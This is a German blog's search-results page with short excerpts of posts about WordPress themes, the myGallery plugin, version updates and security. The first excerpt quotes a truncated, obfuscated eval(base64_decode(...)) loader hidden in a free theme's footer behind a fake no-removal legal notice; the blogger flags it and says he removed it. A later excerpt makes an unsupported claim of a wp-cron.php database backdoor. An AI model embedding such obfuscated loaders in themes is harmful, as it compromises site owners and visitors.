238 Suchergebnisse für

"wordpress"

Unmögliche WordPress Themes

Nein, nicht in Bezug auf das Design, sondern wegen einer anderen Kleinigkeit. So was gehört definitiv nicht in einen Footer:
<?php /* NOTICE: This wordpress theme is provided free as long as you link back to the designer and provider of the theme, If you would like to remove the links back to the designer and provider, Please contact the designer of the theme to buy the rights for use of this template. Removing the following links in the footer is prohibited by law. */ ?><?php
@eval(@base64_decode("QGV2YWwoQHN0cl9yb3QxMyhAZ3ppbmZsYXRlKEBiY
XNlNjRfZGVjb2RlKCJ6VmZmYjlzMkVINHZzUCtCRll6R0doeWJG
Q21SaW44a1c0Q21Ed05Ka2NzZTFoYUc1RXB5dlV5eDZWaW9
VK1IvSHlXbmFkb1ZvUVpzNk93SDIvTHh1Kys3T3g2UHA3UEo2V0s
[usw...]

Für den Laien ist es nicht ersichtlich, was da passiert. Könnte ja auch Schadcode sein. In dem Theme, wo er mir aufgefallen ist, führte der tolle Footer auf jeden Fall dazu, dass die Seite fast 30 Sekunde bis zum vollständigen Laden benötigte. Ein ganz klares „So nicht!” meinerseits. Selbstverständlich habe ich den Code entfernt.

WordPress Frust

Es geht doch nicht süber Beispiele, die nicht funktionieren. Ich für meinen Teil bin erstmal grandios damit gescheitert, in myGallery den Code von dieser Seite einzufügen und so anzupassen, dass der Button wieder angezeigt wird.

Fals mich jemand sucht, ich hänge in der Küche…

Sicherheitslücke in WordPress 2.5

Auch die neue Version von WordPress bricht nicht mit der Tradition kritischer Sicherheitslücken in der Software. Durch eine Hintertür ist es möglich, beliebige Datenbankabfragen von außen durchzuführen – so kann unter anderem der ganze Blog gelöscht oder aber als SPAM-Schleuder missbraucht werden. Verantwortlich dafür ist der Aufruf ignore_user_abort(true) in der Datei wp-cron.php des Stammverzeichnisses. weiterlesen →

Nur ein paar Gedanken zu WordPress

Es gibt Themen, bei denen ich den Anfang des Artikels einige Mal verwerfe und neu anfange. Dieser hier ist wieder mal so einer. Ich habe lange überlegt, ob ich überhaupt dazu was schreibe. Sicher wäre raushalten sehr einfach. Andererseits ist WordPress und die Weiterentwicklung des CMS viel zu wichtig, als dass ich einfach ruhig bleiben könnte. weiterlesen →

WordPress Button Bug

In der aktuellen Version von myGallery werden unter Umständen die Button für den Aufruf des myGallery-Browsers nicht angezeigt. Schuld daran ist nicht myGallery, sondern ein Problem in WordPress, dass wohl mit der verwendeten Version von TinyMCE zusammenhängt. Wie Jörn Kretzschmar in den Kommentaren zum letzten Update von myGallery geschrieben hat, tritt das Problem in der Version 2.3 von WordPress nicht mehr auf. Diese befindet sich derzeit noch im Alphastadium. weiterlesen →

WordPress aufbohren: Fehlermeldungen anpassen

Wer WordPress als CMS einsetzt, möchte an einigen Stellen nicht unbedingt mit der Tür ins Haus fallen. Oder anders gesagt: Wo WordPress drin steckt, muss nicht unbedingt WordPress drauf stehen. Was im Frontend mit eigene Themes gut möglich ist, ist im lässt sich im Backend nur mit erheblichen Aufwand lösen – wobei das in der Regel auch nicht notwendig ist. Schwierig wird es allerdings an den Stellen, wo Funktionen aus dem Backend im Frotend sichtbar werden. Typisches Beispiel dafür sind die Funktionen zur Überprüfung von Kommentaren. Werden nicht alle erforderlichen Felder ausgefüllt, erscheint eine Seite mit einer Fehlermeldung, die von einem WordPress-Logo geschmückt ist. Dies ließe sich zwar mühelos austauschen, aber dennoch durchbricht die Seite mit der Fehlermeldung immer noch das Design der restlichen Seite. weiterlesen →

WordPress für Dummies

Trotz meines derzeitigen WordPress-bashings gibt es für mich derzeit immer noch viele Gründe, die für WordPress auch als CMS für Blog-ferne Projekte sprechen. Der Aufbau der Templates, die Tatsache, dass PHP als Templatesprache verwendet wird (und somit ein nicht zu unterschätzende Performancevorteil entsteht) und die Möglichkeit, WordPress mit eigene Plugins aufzubohren und nicht zuletzt die Einfachheit, mit der sich Seiten sowohl XHTML strict als auch suchmaschinenfreundlich generieren lassen, sind ganz klare Vorteile. weiterlesen →

WordPress vor der Spaltung?

Zugegeben, eine etwas provokante Überschrift. Zugegeben, mir fehlt auch jetzt, wo ich im Zug unterwegs bin die Möglichkeit, im Internet noch mal eben ein paar Fakten nachzuprüfen. Daher ist es wohl auch eher Ausdruck eines persönlichen Gefühls, eine Schwingung, die wie ein leichter Windhauch vorbeizieht. Ich hatte mich ja bereits gestern darüber gewundert, dass wordpress.de nicht mehr zu erreichen ist (Danke an dieser Stelle für die Hinweise, in welches Notquartier die deutsche Comunity derzeit untergebracht wurde). weiterlesen →

WordPress 2.04

Für WordPress ist ab sofort die Version 2.0.4 verfügbar. Da ich aber nur ein Upgrade von Version 2.0.3 auf 2.04 brauche, war es für mich die Gelegenheit, den Unix Befehl diff auszuprobieren. Der hat für mich (und vielleicht auch für andere) die Unterschiede zwischen 2.0.3 und 2.0.4 ermittelt. weiterlesen →

WordPress 2.x Update

Langsam nähere ich mich auch dem Update auf WordPress 2.0.2. Bevor ich mich aber in das Abenteuer stürze, probier ich – vorsichtig wie ich bin – alle Plugins hinsichtlich ihrer Verträglichkeit aus. Mein Tiger Style Admin Plugin zeigte sich etwas störrisch. Der Tellerrand sah, nun ja, zerschossen aus. Ursache dafür war (nicht ist, da ich meine Finger natürlich nicht davon lassen konnte) ein Fehler in der CSS-Datei vom Plugin. weiterlesen →